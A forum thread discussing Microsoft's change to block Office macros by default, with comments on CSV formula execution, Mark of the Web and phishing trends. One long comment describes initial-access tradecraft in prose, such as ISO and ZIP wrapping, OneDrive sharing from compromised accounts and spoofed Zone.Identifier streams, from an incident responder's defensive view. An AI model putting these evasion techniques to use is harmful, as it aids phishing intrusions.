Relatedly, I was recently horrified to learn that not only will Excel (and LibreOffice Calc) automatically parse formulas in plain CSV files, but there is also a formula that will _run external programs_.

That's not the right move. The right move would be a sandbox around every word/excel file being viewed/opened. Ideally, backed by a kernel mechanics such as CreateRestrictedToken WinAPI.

What they are doing instead, shifting responsibility to end users. Specifically, they're simply training users to click on "I agree" buttons.

There's a really great history on this here:

https://insights.sei.cmu.edu/blog/who-needs-to-exploit-vulne...

In summary, each successive version of Office actually walked back the tone of the warning if you tried to enable macros. Office 2000 was still more strict than what we'll have after this change. Office 2010 reduced it to the one yellow bar and a single click enable.

Edit: For those reading, this has been for a while something of an embarrassment. The creator of mimikatz only just made this callout in response to Microsoft's security advertising:

https://nitter.net/gentilkiwi/status/1488937687281242116#m

Further edit:

There's a statement regarding the scale of this change here: https://nitter.net/GossiTheDog/status/1490740535849623552#m

I'm not sure what is really going on here. Macros have been disabled by default for many years now. Is this article from fifteen years ago?

Macros are less commonly used as an attack vector for initial access nowadays. Sure they’ll make it harder for macros, but still is possible to run a one-click attack by attaching a js, jse, hta, paf, ws, wsf, scr, etc. to an email.

Huh. My work computers have always disabled macros, regardless of the file source. I guess this was a corporate configuration that's just now becoming default in the consumer versions.

For what it's worth TeX/LaTeX allows execution of arbitrary shell commands from *.tex documents. Be careful there as well.

They say: "Windows marks files you download with a metadata attribute known as “Mark of the Web” or “zone.identifier.”". Where is this metadata written and at which point?

Does adding this metadata messes up checksum or digital signature?

Sounds like they're just making the macros harder to enable- you need to check a box under file properties.

I guess the "do you want to enable macros" bar wasn't enough discouragement.

How does iOS deal with it ?

Doubt. Quite a bit to unpack here lol.

First of all, are outlook attachments even maked as internet zone? Ok, let's say they are. What if they are in a zip file? With exe's you have to click a few times through a warning dialog to run them when downloaded from the internet, but guess what... not if you stuff them in an ISO. Works reliably too.

Ok, let's say they are disablng macros by default... is it just the orgs I worked at that set this as a default? Because I thought you had to enable editing and then enable macros each time? From a corporate security perspective, an office document with a malicious macros almost never gets past email security appliances.

There are two things true about a significant portion of the user population (even most seasoned security folks and myself as well having had to work in this specific are 5+ years): 1) Users will download untrusted files and open them 2) A much lesser but significant number of users will click through any number of warnings and obstacles to get content to work because at that point to them it is trusted content. It isn't phishing, Bob at so and so company who they work with regularly sent this important document (little do they know, Bob's account is pwned)

Already, you have to work very hard and target a large enough population for the law of averages to work in your favor ad an attacker. Defender had gotten really good even with just the default setting (and much much more with cloud submission) at behavioral detections as well in this area. Majority of succesful compromises I've responded to or read about with office docs have also been Excel 4.0 macros not vba Macros as well.

Here is a thing about modern O365: it's very web centric. Very common to open office docs in the browser office app or with a layer of OneDrive or SharePoint prior. You know what reliably gets past the most hardened email security appliances and tricks majority of users? Put your content in a zip or iso (preferably encrypt it and send the code in the email because it is all so important and confidential) and put it in onedrive or sharepoint and share it with a small but significant population (per compromised or staged+verified account), they will get a very convincing email from O365.

If I had to really stick to vba macros for some reason and users can't enable macros no matter what, I will just include a very convincing image based instructions on how they should add c:\ or something as a trusted folder (4-5 clicks though). Oh, that's disabled too? Here is a neat trick attackers have been using recently: the file in a zip/rar contains a Zone.Identifier ADS stream that marks it as from a trusted zone. As far as I know, this only works because zone.identifier marking from embedded content isn't overriden or checked strictly.

At the end of the day, macros are very useful and powerful. They are even adding python macros in the future. For the same reason you can unblock exe's and even powershell scripts from the internet, macros will be unblockable too and users will unblock even with multiple layers of obstacles. Remember, the legitimacy of the document is beyond question to users at that point.

When I interview users post-incident, they have no idea what happened. They did not get any suspicious email or oprn questionable document. When they are willing, I have had to get them to share their screen and go through their inbox on the day of the compromise (for personal email since it isn't monitored) or just tell them the subject and pull it up to which they are adamant that is a legitimate email.

Also remeber this: the goal id not to infect most users (they would like that though) but to get a foothold on at least one device. The atrackers that send this type of content are experts at delivery and execution, usually not a lot more beyond that (except maybe still information, persist and tamper with defender). Their main goal is to sell access to another party who would use another malware (cobaltstrike is popular but less so these days) to perform manual hacking and lateral movement. It is usually 6-72hrs before the real bad guys show up.

One more thing: SEO optimization and plain ol jscript seems to be working reliably, groups like ReEvil had switched to that last year.

In summary: this is welcome improvement but the game of cat and mouse must go on. Meet the new security, same as the old security. There are threat actors that mail malicious USB drives with teddy bears, just like security evolves so will attacks.

I only dabble with red-team stuff but even then the initial access primitives that work reliably a few months ago are useless now(RIP mshta+js). Red-teams that have to get initial access keep this a secret protected by NDA for that reason.

If Microsoft really wants to be a game changer, they should open up a lot more security controls to all their users not just E5 license holders.

Checkout ASR rules, they have a few more very powerful tools like this: https://docs.microsoft.com/en-us/microsoft-365/security/defe...

Side note: Anyone remember when Excel 4.0 macros could not be disabled in Excel?

undefined

Honestly, I wonder if VBA's most effective security feature has been its bad reputation. There's so much access to inexplicably vast swaths of the Windows ecosystem, combined with a nearly perfect consensus of users who have no idea what a macro is, that it's kind of surprising that VBA hacking isn't more ubiquitous. Security through obscurity via popular loathing?